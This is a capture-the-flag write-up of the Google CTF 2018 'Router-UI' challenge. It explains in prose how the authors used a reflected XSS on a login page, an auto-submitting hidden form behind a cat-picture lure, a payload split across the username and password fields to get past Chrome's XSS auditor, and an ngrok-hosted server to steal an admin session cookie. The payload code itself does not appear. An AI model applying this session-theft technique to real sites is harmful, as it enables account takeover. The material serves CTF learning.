Write-Up: Google CTF 2018 - Router-UI
So it was about finding an XSS vulnerability on the supplied webpage. XSS stands for Cross-site scripting and specifies a vulnerability where the attacker injects client-side scripts into a webpage with the aim of getting the session token of the user or perform other malicious actions like manipulating user interaction or logging keystrokes.
We quickly took a look at the page and were presented with a simple login page of the “OffHub Management Interface”.
I tested the login with some random credentials and got an interesting return.
The payload obviously has to retrieve the victims session token and somehow send it to us. This code was what we came up for the XSS payload that should steal the victims session token from the cookies:
We now wrote a quick & dirty express-server to publish an endpoint to that our second payload would send the victims session token. Then we could host it temporarily with ngrok.
Then we noticed that we had one problem we didn't address till this time. We had to somehow trick the victim to inject evil script onto the webpage. The description of the challenge reads: “If you claim your link includes cat pictures, I’m sure Wintermuted will click it.”
So we quickly crafted some HTML with a cute cat picture and a hidden copy of the login form we saw on the original webpage that would on load immediately submit itself with an action attribute pointing to https://router-ui.web.ctfcompetition.com/login. Then we set the input values to our first XSS payload that would then load the real payload from our server.
As you can see we set the username input fields value to “https:” and the password input fields value to the ngrok address plus the path to our payload. We can omit the slashes because they are already present in the HTML when we get the “wrong credentials” output. By doing so we can bypass Chromes XSS auditor and load our payload.
It worked! After jumping for joy I crafted an email with the link to our page and sent it to the specified email-address. We had to wait for some seconds and then we saw the session cookie arriving in our server logs. Yes, we got 'em!
After importing the session token we got the admin page.